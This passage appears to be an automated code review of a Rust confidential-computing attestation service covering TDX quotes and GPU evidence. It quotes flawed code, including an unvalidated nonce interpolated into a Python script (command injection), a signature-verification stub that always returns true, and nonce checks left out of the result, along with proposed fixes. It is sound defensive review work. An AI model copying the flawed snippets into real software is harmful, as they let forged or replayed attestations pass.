crates/basilica-tee/src/service.rs-255-263 (1)

255-263: ⚠️ Potential issue | 🟠 Major

tee_verified ignores nonce_verified and report_data_matches.

The overall verification result doesn't account for nonce_verified (GPU) or report_data_matches (TDX). An attestation with correct signatures but wrong nonce would still pass, defeating replay protection.

Proposed fix
         let tee_verified = match (&tdx_result, &gpu_result) {
             (Some(tdx), Some(gpu)) => {
-                tdx.quote_valid && tdx.mrtd_matches && gpu.cc_mode_enabled && gpu.attestation_valid
+                tdx.quote_valid && tdx.mrtd_matches && tdx.report_data_matches
+                    && gpu.cc_mode_enabled && gpu.attestation_valid && gpu.nonce_verified
             }
-            (Some(tdx), None) => tdx.quote_valid && tdx.mrtd_matches,
-            (None, Some(gpu)) => gpu.cc_mode_enabled && gpu.attestation_valid,
+            (Some(tdx), None) => tdx.quote_valid && tdx.mrtd_matches && tdx.report_data_matches,
+            (None, Some(gpu)) => gpu.cc_mode_enabled && gpu.attestation_valid && gpu.nonce_verified,
             (None, None) => false,
         };
crates/basilica-tee/src/gpu/verifier.rs-38-50 (1)

38-50: ⚠️ Potential issue | 🟠 Major

Stub signature verification is a significant security gap for production.

verify_signature always returns Ok(true), meaning any evidence will pass local verification. While documented, this effectively makes LocalGpuVerifier unsuitable for production attestation — it provides no cryptographic guarantees. Consider at minimum logging at warn! level (not debug!) to make this more visible in production logs, or gating behind a stub-verification feature so it can't silently slip into a production build.

Suggested log level change
     fn verify_signature(&self, _evidence: &GpuAttestationEvidence) -> TeeResult<bool> {
-        debug!("[GpuVerifier] Signature verification stub - returning true");
-        debug!("[GpuVerifier] NOTE: Implement actual verification for production use");
+        warn!("[GpuVerifier] Signature verification stub - returning true. NOT SAFE FOR PRODUCTION.");

         Ok(true)
     }
crates/basilica-tee/src/tdx/provider.rs-94-99 (1)

94-99: ⚠️ Potential issue | 🟠 Major

Certificate hash errors silently swallowed — security degradation.

Line 96 uses .ok() to discard cert hash failures. If the server certificate is configured but hashing fails (e.g., file not found, OpenSSL error), the quote is generated without cert binding. This is a silent security downgrade that should at minimum log a warning.

Proposed fix
         let cert_hash = if self.server_cert_path.is_some() {
-            self.get_cert_hash().await.ok()
+            match self.get_cert_hash().await {
+                Ok(hash) => Some(hash),
+                Err(e) => {
+                    warn!("Failed to compute certificate hash, quote will not include cert binding: {}", e);
+                    None
+                }
+            }
         } else {
             None
         };
crates/basilica-tee/src/service.rs-232-253 (1)

232-253: ⚠️ Potential issue | 🟠 Major

Only the first GPU evidence entry is verified — multi-GPU setups are silently ignored.

evidence_list.first() verifies only one GPU. If the attestation includes multiple GPUs, the remaining ones are unchecked. The GpuVerifier trait already provides verify_all for this purpose. Also, gpu_result stores a single Option<GpuCcVerificationResult> rather than a Vec.

Suggested approach: verify all GPU evidence
-        let mut gpu_result: Option<GpuCcVerificationResult> = None;
+        let mut gpu_results: Vec<GpuCcVerificationResult> = Vec::new();
         ...
-            if let Some(first_evidence) = evidence_list.first() {
-                match self
-                    .gpu_verifier
-                    .verify(first_evidence, Some(&attestation.nonce_hex))
-                    .await
-                {
-                    Ok(result) => {
-                        gpu_result = Some(result);
-                ...
+                match self
+                    .gpu_verifier
+                    .verify_all(&evidence_list, Some(&attestation.nonce_hex))
+                    .await
+                {
+                    Ok(results) => {
+                        gpu_results = results;
+                ...

This would also require updating TeeVerificationResult to hold a Vec<GpuCcVerificationResult> instead of Option<GpuCcVerificationResult>.

crates/basilica-tee/src/server/handlers.rs-199-199 (1)

199-199: ⚠️ Potential issue | 🟠 Major

Empty string as default nonce weakens attestation freshness.

When params.nonce is None, the code defaults to "", generating attestation without a meaningful nonce. This defeats replay protection. Consider returning a 400 Bad Request if no nonce is provided, or at minimum documenting this as intentional behavior.

Proposed fix: require nonce
-        let nonce = params.nonce.as_deref().unwrap_or("");
+        let nonce = match params.nonce.as_deref() {
+            Some(n) if !n.is_empty() => n,
+            _ => {
+                return Err((
+                    StatusCode::BAD_REQUEST,
+                    Json(ErrorResponse {
+                        error: "Nonce is required for evidence generation".to_string(),
+                    }),
+                ));
+            }
+        };
🟡 Minor comments (26)
crates/basilica-validator/src/metrics/prometheus_metrics.rs-875-877 (1)

875-877: ⚠️ Potential issue | 🟡 Minor

Persistence errors logged at debug! — should be error! or warn! for consistency.

collect_system_metrics (line 532) logs failures at error! level. A database query failure here has the same operational impact and would be invisible in production at default log levels.

Suggested fix
             Err(e) => {
-                debug!("Failed to collect TEE metrics from database: {}", e);
+                error!("Failed to collect TEE metrics from database: {}", e);
             }
justfile-160-168 (1)

160-168: ⚠️ Potential issue | 🟡 Minor

Missing confirmation prompt for a destructive reboot action.

test-tdx-reboot reboots a remote node but has no user confirmation prompt, unlike the other destructive targets (test-tdx-setup, test-tdx-setup-full, test-tdx-guest-quote, test-tdx-vm-create, test-tdx-attestation) which all gate execution behind read -p ... (y/N).

🛡️ Proposed fix: add a confirmation prompt
 test-tdx-reboot HOST USER="root" KEY_PATH="~/.ssh/id_rsa":
     #!/usr/bin/env bash
     set -euo pipefail
-    echo "🔄 Rebooting {{HOST}} and waiting for it to come back..."
-    TDX_TEST_HOST="{{HOST}}" \
-    TDX_TEST_USER="{{USER}}" \
-    TDX_TEST_KEY_PATH="{{KEY_PATH}}" \
-    cargo test --package basilica-validator --test tdx_host_integration_test test_reboot_and_wait -- --ignored --nocapture
+    echo "⚠️  Rebooting {{HOST}} and waiting for it to come back..."
+    read -p "Are you sure? (y/N) " -n 1 -r
+    echo
+    if [[ $REPLY =~ ^[Yy]$ ]]; then
+        TDX_TEST_HOST="{{HOST}}" \
+        TDX_TEST_USER="{{USER}}" \
+        TDX_TEST_KEY_PATH="{{KEY_PATH}}" \
+        cargo test --package basilica-validator --test tdx_host_integration_test test_reboot_and_wait -- --ignored --nocapture
+    else
+        echo "Cancelled."
+    fi
crates/basilica-tee/src/gpu/utils.rs-78-83 (1)

78-83: ⚠️ Potential issue | 🟡 Minor

gpu_id_contains_any uses bidirectional substring check which can produce false positives.

The bidirectional contains check (gpu_id.contains(&normalized_target) || normalized_target.contains(gpu_id)) means a short gpu_id like "GPU-1" would match a target "GPU-123" via the second branch. This seems overly permissive for a security-related GPU identity check.

Also, this function mixes normalize_gpu_id (prefix-based) with substring matching, while sibling functions use sanitize_gpu_id (strip-and-compare). The inconsistency could lead to subtle matching bugs.

Consider whether exact-match via gpu_id_in_list is sufficient, or clarify the intended use case for substring matching.

crates/basilica-tee/src/bootstrap/commands/tdx_guest.rs-335-405 (1)

335-405: ⚠️ Potential issue | 🟡 Minor

TMPDIR variable shadowing in TEST_GUEST_QUOTE_GEN.

Same issue as in tdx.rs — the script reassigns TMPDIR (Line 360), which shadows the standard environment variable that tools like mktemp rely on. Use a different name (e.g., WORK_DIR).

crates/basilica-miner/src/tee.rs-82-89 (1)

82-89: ⚠️ Potential issue | 🟡 Minor

GPU CC check error is silently dropped when TDX check also failed.

Line 85: if status.error.is_none() means if both TDX and GPU CC checks fail, only the TDX error is preserved. The GPU CC error is silently lost. Consider appending errors instead.

Proposed fix
             Err(e) => {
                 warn!("[TEE] Failed to check GPU CC on node {}: {}", node_id, e);
-                if status.error.is_none() {
-                    status.error = Some(format!("GPU CC check failed: {}", e));
-                }
+                let gpu_err = format!("GPU CC check failed: {}", e);
+                status.error = Some(match status.error.take() {
+                    Some(existing) => format!("{}; {}", existing, gpu_err),
+                    None => gpu_err,
+                });
             }
crates/basilica-tee/src/bootstrap/commands/tdx.rs-131-161 (1)

131-161: ⚠️ Potential issue | 🟡 Minor

TMPDIR shadows the standard environment variable; QUOTE_FAILED exits 0.

Two issues in TEST_QUOTE_GENERATION:

  1. Line 134: Reassigning TMPDIR shadows the well-known env var that mktemp and other tools depend on. Use a different variable name (e.g., WORK_DIR).
  2. Line 160: The QUOTE_FAILED path falls through without exit 1, so callers cannot distinguish success from failure by exit code.
Proposed fix
-    TMPDIR=$(mktemp -d)
+    WORK_DIR=$(mktemp -d)
     
     # Write nonce to file
-    echo -n "$TEST_NONCE" | xxd -r -p > "$TMPDIR/nonce.bin"
+    echo -n "$TEST_NONCE" | xxd -r -p > "$WORK_DIR/nonce.bin"
     
     # Try Intel's tdx_attest tool
     if command -v tdx_attest &>/dev/null; then
-        if tdx_attest -r "$TMPDIR/nonce.bin" -q "$TMPDIR/quote.bin" 2>/dev/null; then
-            QUOTE_SIZE=$(stat -c%s "$TMPDIR/quote.bin" 2>/dev/null || stat -f%z "$TMPDIR/quote.bin" 2>/dev/null)
+        if tdx_attest -r "$WORK_DIR/nonce.bin" -q "$WORK_DIR/quote.bin" 2>/dev/null; then
+            QUOTE_SIZE=$(stat -c%s "$WORK_DIR/quote.bin" 2>/dev/null || stat -f%z "$WORK_DIR/quote.bin" 2>/dev/null)
             if [ "$QUOTE_SIZE" -gt 1000 ]; then
-                rm -rf "$TMPDIR"
+                rm -rf "$WORK_DIR"
                 echo "QUOTE_OK:tdx_attest:$QUOTE_SIZE"
                 exit 0
             fi
@@ ..
     # Try using TDX device directly with a simple test
     if [ -c /dev/tdx_guest ] || [ -c /dev/tdx-guest ]; then
         # The device exists, quote generation should be possible via libraries
-        rm -rf "$TMPDIR"
+        rm -rf "$WORK_DIR"
         echo "DEVICE_OK:tdx_guest"
         exit 0
     fi
     
-    rm -rf "$TMPDIR"
+    rm -rf "$WORK_DIR"
     echo "QUOTE_FAILED"
+    exit 1
crates/basilica-tee/src/bootstrap/commands/tdx.rs-84-91 (1)

84-91: ⚠️ Potential issue | 🟡 Minor

RHEL repo baseurl hardcoded to version 8.

The repo configuration hardcodes rhel/8/$basearch. This will install incorrect packages on RHEL 9+ systems. Consider detecting the major version dynamically (e.g., via $(rpm -E %{rhel})) or at minimum documenting this limitation.

Proposed fix
-        sudo tee /etc/yum.repos.d/intel-sgx.repo > /dev/null << 'REPOEOF'
-[intel-sgx]
-name=Intel SGX Repository
-baseurl=https://download.01.org/intel-sgx/sgx_repo/rhel/8/$basearch
-enabled=1
-gpgcheck=1
-gpgkey=https://download.01.org/intel-sgx/sgx_repo/rhel/8/sgx_rpm_local_repo.pub
-REPOEOF
+        RHEL_VER=$(rpm -E %{rhel} 2>/dev/null || echo "8")
+        sudo tee /etc/yum.repos.d/intel-sgx.repo > /dev/null << REPOEOF
+[intel-sgx]
+name=Intel SGX Repository
+baseurl=https://download.01.org/intel-sgx/sgx_repo/rhel/${RHEL_VER}/\$basearch
+enabled=1
+gpgcheck=1
+gpgkey=https://download.01.org/intel-sgx/sgx_repo/rhel/${RHEL_VER}/sgx_rpm_local_repo.pub
+REPOEOF
crates/basilica-tee/src/gpu/device.rs-113-118 (1)

113-118: ⚠️ Potential issue | 🟡 Minor

Model short-ref extraction is fragile.

Taking the last whitespace-delimited word of the GPU name (e.g., "NVIDIA H100 PCIe""pcie") may not produce the useful model identifier you expect (e.g., "h100"). Multi-word suffixes like "80GB PCIe" would yield "pcie" instead of the model name. Consider a more robust extraction or matching against known model patterns.

crates/basilica-tee/src/tdx/mod.rs-1-7 (1)

1-7: ⚠️ Potential issue | 🟡 Minor

Doc mentions v5 support but only v4 types are re-exported.

Line 4 states "TDX quote parsing (v4/v5)" but only TdxQuoteV4 is re-exported. If v5 isn't implemented yet, update the doc to avoid implying it's supported (e.g., "v4, with v5 planned").

crates/basilica-tee/src/lib.rs-12-21 (1)

12-21: ⚠️ Potential issue | 🟡 Minor

Module doc list is incomplete — crypto and service are missing.

Both crypto (Line 24) and service (Line 29) are publicly exported but not listed in the doc header. Add entries for completeness.

📝 Proposed doc update
 //! - [`config`]: Configuration types for TEE settings
 //! - [`error`]: Error types for TEE operations
+//! - [`crypto`]: Cryptographic utilities for TEE operations
 //! - [`types`]: Shared data types
 //! - [`traits`]: Core trait abstractions for providers and verifiers
+//! - [`service`]: TEE attestation service orchestration
crates/basilica-tee/src/bootstrap/commands/tdx_host.rs-145-182 (1)

145-182: ⚠️ Potential issue | 🟡 Minor

PCCS_PASSWORD parameter is accepted but never used.

Line 147 reads PCCS_PASSWORD from env/args, but the PCCS config template (lines 156-169) never uses it. The UserTokenHash and AdminTokenHash fields are left empty, meaning the PCCS management API has no authentication.

If the password is intended to populate these hash fields, it needs to be hashed (SHA-512) and written into the config. If auth isn't needed for this use case, remove the dead PCCS_PASSWORD parameter to avoid confusion.

crates/basilica-validator/tests/tdx_host_integration_test.rs-9-14 (1)

9-14: ⚠️ Potential issue | 🟡 Minor

Hard-coded IP address in documentation.

Line 10 contains what appears to be a real host IP (151.185.43.58). Replace with a placeholder like <TDX_HOST_IP> to avoid leaking infrastructure details in source control.

Proposed fix
-//! TDX_TEST_HOST=151.185.43.58 \
+//! TDX_TEST_HOST=<TDX_HOST_IP> \
crates/basilica-validator/src/config/main_config.rs-204-207 (1)

204-207: ⚠️ Potential issue | 🟡 Minor

Default DCAP URL points to Intel's development attestation service.

The URL contains /dev/ in the path (sgx/dev/attestation/v4/report), indicating a development endpoint. Operators deploying with default configuration will route attestation requests to Intel's dev service, which is inappropriate for production. Either use a documented production endpoint or require this to be explicitly configured and add a clear warning in comments/documentation.

crates/basilica-tee/src/tdx/remote_verification.rs-171-174 (1)

171-174: ⚠️ Potential issue | 🟡 Minor

Hardcoded mrtd_matches: true and rtmr_matches: vec![true; 4] are misleading.

Returning true for measurements that were never actually checked makes downstream consumers unable to distinguish "verified and matched" from "not checked." Consider using an Option<bool> or a separate enum to express "not checked by remote" vs. "checked and matched."

crates/basilica-tee/src/tdx/remote_verification.rs-151-152 (1)

151-152: ⚠️ Potential issue | 🟡 Minor

Inconsistency between inline validity check and QuoteVerificationStatus::is_acceptable().

Line 151-152 accepts only "OK" and "GROUP_OUT_OF_DATE", while QuoteVerificationStatus::is_acceptable() (Line 239-248) also accepts ConfigurationNeeded, SwHardeningNeeded, and ConfigurationAndSwHardeningNeeded. The enum is defined but never used in verify(). Consider using the enum to determine validity for consistency:

-        let quote_valid = verification.is_v_enclave_quote_status == "OK"
-            || verification.is_v_enclave_quote_status == "GROUP_OUT_OF_DATE";
+        let status = QuoteVerificationStatus::from(verification.is_v_enclave_quote_status.as_str());
+        let quote_valid = status.is_acceptable();

Also applies to: 237-254

crates/basilica-tee/src/bootstrap/types.rs-7-18 (1)

7-18: ⚠️ Potential issue | 🟡 Minor

command_timeout_secs defaults to 0 — likely causes immediate command timeouts.

TeeBootstrapConfig derives Default, so command_timeout_secs: u64 defaults to 0. Any command execution using this timeout would either fail immediately or be interpreted as "no timeout" depending on the consumer. Consider providing a sensible default:

Proposed fix
-#[derive(Debug, Clone, Default)]
+#[derive(Debug, Clone)]
 pub struct TeeBootstrapConfig {
     /// Whether to attempt TDX setup
     pub setup_tdx: bool,
     /// Whether to attempt GPU CC setup
     pub setup_gpu_cc: bool,
     /// Timeout for setup commands (seconds)
     pub command_timeout_secs: u64,
     /// Whether to install packages (requires sudo)
     pub allow_package_install: bool,
 }
+
+impl Default for TeeBootstrapConfig {
+    fn default() -> Self {
+        Self {
+            setup_tdx: false,
+            setup_gpu_cc: false,
+            command_timeout_secs: 120,
+            allow_package_install: false,
+        }
+    }
+}
crates/basilica-tee/src/server/mod.rs-128-147 (1)

128-147: ⚠️ Potential issue | 🟡 Minor

unwrap() in deprecated with_providers can panic at runtime.

Line 140 uses .unwrap() on TeeService::new(hostname). If service creation fails for any reason, this panics. Even though the function is deprecated, callers may still use it. Consider returning a TeeResult<Self> or propagating the error.

Proposed fix
     #[deprecated(note = "Use with_service instead")]
     pub fn with_providers(
         hostname: String,
         _tdx_provider: crate::tdx::TdxQuoteProvider,
         _nv_provider: crate::gpu::NvEvidenceProvider,
         gpu_provider: GpuDeviceProvider,
         bind_addr: SocketAddr,
-    ) -> Self {
-        // Create a service with default providers
-        let service = TeeService::new(hostname).unwrap();
-        Self {
+    ) -> TeeResult<Self> {
+        let service = TeeService::new(hostname)?;
+        Ok(Self {
             service: Arc::new(service),
             gpu_provider,
             bind_addr,
-        }
+        })
     }
crates/basilica-validator/src/persistence/tee_profile.rs-39-76 (1)

39-76: ⚠️ Potential issue | 🟡 Minor

gpu_cc_uuid is never inserted but is selected — reads will always return NULL.

The INSERT statement omits the gpu_cc_uuid column, so it will remain NULL for all inserted/updated rows. Both get_node_tee_status (line 109) and get_node_tee_status_by_node_id (line 228) select this column, meaning callers will always receive NULL values.

However, TeeVerificationStatus does not have a gpu_cc_uuid field to provide data. Either the column should not be selected, or gpu_cc_uuid needs to be added to TeeVerificationStatus and bound in the INSERT statement.

crates/basilica-tee/src/server/handlers.rs-119-127 (1)

119-127: ⚠️ Potential issue | 🟡 Minor

Internal error details exposed to API clients.

Error messages like format!("Attestation failed: {}", e) propagate internal TeeError details to the HTTP response. In a security-sensitive attestation service, this could leak implementation details. Consider returning generic messages to clients and logging the detailed error server-side only.

Also applies to: 146-154, 205-213

crates/basilica-protocol/proto/tee.proto-17-18 (1)

17-18: ⚠️ Potential issue | 🟡 Minor

bytes field for hex-encoded nonce is semantically inconsistent.

The comment says "64 bytes, hex encoded" but the field type is bytes. If the value is hex-encoded, use string; if it's raw bytes, update the comment. This same inconsistency appears in NodeTeeStatus.mrtd (Line 140) and all ExpectedMeasurements fields (Lines 170-182). Mismatched semantics between proto type and usage will cause confusion for consumers.

crates/basilica-tee/src/server/handlers.rs-159-186 (1)

159-186: ⚠️ Potential issue | 🟡 Minor

Single-purpose endpoints trigger full attestation unnecessarily.

Both get_tdx_quote and get_nvtrust_evidence call state.service.attest(), which generates both TDX quotes and GPU evidence. Each endpoint then discards the unneeded half. This wastes resources (e.g., unnecessary GPU attestation calls). Consider adding dedicated methods on TeeService (e.g., attest_tdx_only, attest_gpu_only), or passing flags to skip the unneeded provider.

Also applies to: 188-223

crates/basilica-tee/src/gpu/verifier.rs-60-77 (1)

60-77: ⚠️ Potential issue | 🟡 Minor

Nonce value logged in warning message — potential information leakage.

Line 69-70 logs both the expected and actual nonce values at warn level. Nonces are security-relevant and should not be written to logs in plaintext. Log only the mismatch fact, not the values.

Proposed fix
             if !matches {
                 warn!(
-                    "[GpuVerifier] Nonce mismatch: expected {}, got {}",
-                    expected, evidence.nonce
+                    "[GpuVerifier] Nonce mismatch for GPU {}",
+                    evidence.gpu_uuid
                 );
             }
crates/basilica-tee/src/service.rs-110-115 (1)

110-115: ⚠️ Potential issue | 🟡 Minor

from_tee_config uses a single enabled flag for both TDX and GPU.

Both enable_tdx and enable_gpu are set to tee_config.enabled. Neither TdxConfig nor GpuCcConfig have independent enabled fields that could be respected, meaning TDX and GPU cannot be enabled/disabled separately when initializing from config. While the builder pattern provides enable_tdx() and enable_gpu() methods to override these values, the from_tee_config factory method treats them as a unit.

crates/basilica-validator/src/miner_prover/validation_tdx_host.rs-445-454 (1)

445-454: ⚠️ Potential issue | 🟡 Minor

is_tdx_ready may undercount readiness requirements.

The check only tests tdx_initialized && !reboot_required, but a TDX host also needs PCCS and QGS running for attestation to work. Callers relying on this as a "ready for attestation" gate will get false positives if those services are down.

Consider whether pccs_running and qgs_running should be part of this predicate, or rename/document the method to clarify it checks initialization only.

crates/basilica-validator/src/miner_prover/validation_tdx_host.rs-428-431 (1)

428-431: ⚠️ Potential issue | 🟡 Minor

setup_tdx_host returns Ok even when the remote script reports SETUP_FAILED.

When SETUP_FAILED: is detected (line 428), the method only logs a warning but still returns Ok(result) with most fields at their default false. Callers that only check the Result envelope will miss the failure.

Consider either returning an error, or at minimum documenting this contract clearly so callers know to inspect TdxHostSetupResult fields.

crates/basilica-validator/src/miner_prover/validation_tdx_host.rs-870-875 (1)

870-875: ⚠️ Potential issue | 🟡 Minor

Swallowed install failure makes attestation test failures harder to diagnose.

Line 874 uses unwrap_or_default(), discarding any error from installing guest attestation tools. If the install fails, the subsequent quote-generation test will also fail, but the root cause (install failure) is lost.

Consider at least logging at warn level when the install fails, similar to how other methods in this file handle partial failures.

Suggested fix
-        let install_output = self
+        let install_output = match self
             .ssh_client
             .execute_command(connection, &install_cmd, true)
             .await
-            .unwrap_or_default();
+        {
+            Ok(output) => output,
+            Err(e) => {
+                warn!("[TDX VM] Failed to install guest attestation tools: {}", e);
+                String::new()
+            }
+        };

Comment on lines +77 to +105
async fn get_evidence_python_sdk(nonce: &str) -> TeeResult<String> {
let script = format!(
r#"
import json
from nv_attestation_sdk import attestation
nonce = bytes.fromhex('{}')
evidence = attestation.get_evidence(nonce)
print(json.dumps(evidence))
"#,
nonce
);

let output = Command::new("python3")
.args(["-c", &script])
.output()
.await
.map_err(|e| TeeError::GpuAttestation(format!("Failed to run Python SDK: {}", e)))?;

if output.status.success() {
let stdout = String::from_utf8_lossy(&output.stdout);
Ok(stdout.trim().to_string())
} else {
let stderr = String::from_utf8_lossy(&output.stderr);
Err(TeeError::GpuAttestation(format!(
"Python SDK failed: {}",
stderr
)))
}
}
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Command injection via nonce interpolation into Python script.

The nonce parameter is interpolated directly into a Python script string (Line 82) via format!. If nonce contains characters like ', \n, or Python code fragments, it can break out of the string context and execute arbitrary Python code. Since this nonce originates from attestation flows, it should be hex-encoded, but there's no validation.

Proposed fix — validate nonce is hex before interpolation
     async fn get_evidence_python_sdk(nonce: &str) -> TeeResult<String> {
+        // Validate nonce is hex-only to prevent injection
+        if !nonce.chars().all(|c| c.is_ascii_hexdigit()) {
+            return Err(TeeError::GpuAttestation(
+                "Nonce must be a hex string".into(),
+            ));
+        }
+
         let script = format!(
🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/gpu/nvtrust.rs` around lines 77 - 105, The
get_evidence_python_sdk function currently interpolates the nonce directly into
a Python script which allows command injection; validate and sanitize the nonce
before using it in the format! call: ensure the nonce string contains only hex
characters (0-9, a-f, A-F) and the expected length (or return a
TeeError::GpuAttestation on invalid input), and only then build the script
passed to Command::new("python3"); alternatively, avoid interpolation by passing
the nonce via stdin or as a safe argument to the Python process (but if keeping
the script string, enforce strict hex validation of the nonce variable first).

Comment on lines +206 to +208

let nonce = expected_nonce.unwrap_or(attestation.nonce_hex.as_bytes());

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Nonce fallback uses hex string's UTF-8 bytes instead of actual nonce bytes — likely verification mismatch.

When expected_nonce is None, the fallback attestation.nonce_hex.as_bytes() produces the UTF-8 encoding of the hex string (e.g., "deadbeef"[0x64, 0x65, 0x61, 0x64, ...]), not the decoded nonce bytes ([0xde, 0xad, 0xbe, 0xef]). The TDX verifier likely expects the raw nonce bytes embedded in the quote's report data. This will cause nonce verification to fail when no explicit expected_nonce is provided.

Proposed fix
-        let nonce = expected_nonce.unwrap_or(attestation.nonce_hex.as_bytes());
+        let decoded_nonce;
+        let nonce = match expected_nonce {
+            Some(n) => n,
+            None => {
+                decoded_nonce = hex::decode(&attestation.nonce_hex)
+                    .map_err(|e| TeeError::TdxQuoteVerification(format!("Invalid nonce hex: {}", e)))?;
+                &decoded_nonce
+            }
+        };
🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/service.rs` around lines 206 - 208, The current
fallback sets nonce =
expected_nonce.unwrap_or(attestation.nonce_hex.as_bytes()), which uses the UTF-8
bytes of the hex string instead of the decoded nonce bytes; change this to
decode attestation.nonce_hex from hex (e.g., via hex::decode or similar) and use
the resulting Vec<u8> / slice as the fallback for nonce, handling any decode
errors (returning an Err/verification failure) rather than silently using the
UTF-8 bytes; update the assignment that produces nonce and any downstream
expectations to use the decoded bytes (referencing expected_nonce,
attestation.nonce_hex, and the nonce variable).

Comment on lines +93 to +116
pub async fn get_quote(&self, nonce: &str) -> TeeResult<Vec<u8>> {
// Get certificate hash if configured
let cert_hash = if self.server_cert_path.is_some() {
self.get_cert_hash().await.ok()
} else {
None
};

// Combine nonce and cert hash for report data
// TDX report data is 64 bytes (128 hex chars)
let report_data = if let Some(hash) = cert_hash {
// nonce (64 hex chars) + cert_hash (64 hex chars) = 128 hex chars
let mut data = format!("{}{}", nonce, hash);
data.truncate(128);
data
} else {
// Pad nonce to 128 hex chars
let mut data = nonce.to_string();
data.truncate(128);
while data.len() < 128 {
data.push('0');
}
data
};
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

Report data not padded to 128 hex chars when cert_hash is present but combined length is short.

When cert_hash is Some, the code concatenates nonce + hash and truncates to 128. However, if their combined length is already less than 128 (e.g., short nonce), no zero-padding is applied — unlike the else branch which pads. TDX report data must be exactly 64 bytes (128 hex chars). This will produce malformed report data when nonce is shorter than 64 hex chars.

Proposed fix
         let report_data = if let Some(hash) = cert_hash {
             // nonce (64 hex chars) + cert_hash (64 hex chars) = 128 hex chars
             let mut data = format!("{}{}", nonce, hash);
             data.truncate(128);
+            while data.len() < 128 {
+                data.push('0');
+            }
             data
         } else {
🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/tdx/provider.rs` around lines 93 - 116, In get_quote,
the Some(cert_hash) branch builds report_data by concatenating nonce + hash then
truncating but it never pads when the combined length < 128, producing too-short
report data; update the Some(cert_hash) branch (in function get_quote) to after
concatenation call data.truncate(128) and then while data.len() < 128 push '0'
(same padding logic as the else branch) so the final report_data is exactly 128
hex chars (64 bytes).

Comment on lines +183 to +188
#[async_trait]
impl QuoteProvider for TdxQuoteProvider {
async fn generate_quote(&self, report_data: &[u8]) -> TeeResult<Vec<u8>> {
let report_data_hex = hex::encode(report_data);
self.get_quote(&report_data_hex).await
}
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

generate_quote hex-encodes raw report data then re-processes it as a nonce — semantic mismatch.

The QuoteProvider::generate_quote trait method accepts raw report_data bytes (presumably the full 64-byte report data blob). However, this implementation hex-encodes the input and passes it to get_quote, which then treats it as a nonce and potentially appends a cert hash and pads. If the caller passes 64 raw bytes, hex::encode produces 128 hex chars, which when concatenated with a cert hash would be 192 chars — the cert hash gets truncated away. This double-encoding/reinterpretation will produce incorrect report data.

Consider either: (a) having generate_quote bypass the nonce+cert_hash logic and pass hex-encoded report_data directly to the CLI, or (b) documenting that generate_quote should only receive the nonce portion, not full report data.

🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/tdx/provider.rs` around lines 183 - 188, The
implementation of TdxQuoteProvider::generate_quote incorrectly hex-encodes full
64-byte report_data then hands it to get_quote which treats it as a nonce
(causing truncation when cert hash/padding are applied); change generate_quote
so it does NOT re-interpret raw report_data as a nonce: either call a
new/internal helper that sends the hex-encoded report_data directly to the CLI
without nonce+cert_hash logic, or update get_quote to accept a flag/alternate
path for pre-formed report_data and bypass the nonce+cert_hash/padding routine;
update TdxQuoteProvider::generate_quote to use that direct path (reference:
generate_quote, get_quote, QuoteProvider, TdxQuoteProvider) and ensure length
handling matches the expected CLI input for full report blobs.

Comment on lines +26 to +39
pub struct QuoteHeader {
/// Version of the quote structure (must be 4)
pub version: u16,
/// Attestation key type (2 = ECDSA-256-with-P-256)
pub attestation_key_type: u16,
/// TEE type (0x81 = TDX)
pub tee_type: u32,
/// Reserved bytes
pub reserved: [u8; 2],
/// QE Vendor ID (16 bytes)
pub qe_vendor_id: [u8; 16],
/// User data from Quote request (20 bytes)
pub user_data: [u8; 20],
}
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

cat -n crates/basilica-tee/src/tdx/quote.rs | head -100

Repository: one-covenant/basilica

Length of output: 3718


🌐 Web query:

Intel TDX DCAP Quote Version 4 header specification byte offsets

💡 Result:

Intel TDX DCAP Quote v4 header is 48 bytes total, laid out (little-endian for integer fields) as follows. (docs.rs)

Byte offset (dec/hex) Size Field
0 / 0x00 2 version (u16)
2 / 0x02 2 attestation_key_type (u16)
4 / 0x04 4 tee_type (u32)
8 / 0x08 2 reserved1[2]
10 / 0x0A 2 reserved2[2]
12 / 0x0C 16 qe_vendor_id[16]
28 / 0x1C 20 user_data[20]

So the header occupies byte range [0..47], and the quote body starts at offset 48 (0x30). (docs.rs)

Citations:


🏁 Script executed:

cat -n crates/basilica-tee/src/tdx/quote.rs | sed -n '200,300p'

Repository: one-covenant/basilica

Length of output: 4856


🏁 Script executed:

cat -n crates/basilica-tee/src/tdx/quote.rs | sed -n '100,200p'

Repository: one-covenant/basilica

Length of output: 3832


Header struct is missing the second reserved field, causing qe_vendor_id and user_data to be parsed from wrong offsets.

The Intel TDX DCAP specification defines the 48-byte header with two 2-byte reserved fields at offsets 8–11, followed by qe_vendor_id at 12–27 and user_data at 28–47. The current struct declares only one reserved: [u8; 2] field, then reads qe_vendor_id from offset 10–25 (2 bytes too early) and user_data from offset 26–45 (2 bytes too early). The missing reserved2 field causes the QE Vendor ID and User Data to be parsed from incorrect memory locations. Additionally, to_bytes() only writes 46 of 48 bytes, leaving offsets 46–47 as zeros—data loss on round-trip serialization.

Also, verify_nonce() (line 194) uses prefix matching: it compares only the first expected_nonce.len() bytes, ignoring trailing bytes of the 32-byte nonce field. This allows incomplete nonce validation.

🤖 Prompt for AI Agents
In `@crates/basilica-tee/src/tdx/quote.rs` around lines 26 - 39, The QuoteHeader
struct is missing the second 2-byte reserved field which shifts qe_vendor_id and
user_data by 2 bytes and causes to_bytes() to emit only 46 bytes; add a second
reserved field (e.g., reserved2: [u8; 2]) to QuoteHeader so the layout matches
the 48-byte TDX header, update any parsing/serialization logic in
QuoteHeader::to_bytes() and the constructor/deserializer to read/write all 48
bytes (including reserved2) so qe_vendor_id (16 bytes) and user_data (20 bytes)
are at the correct offsets, and ensure to_bytes() writes the full 48 bytes (no
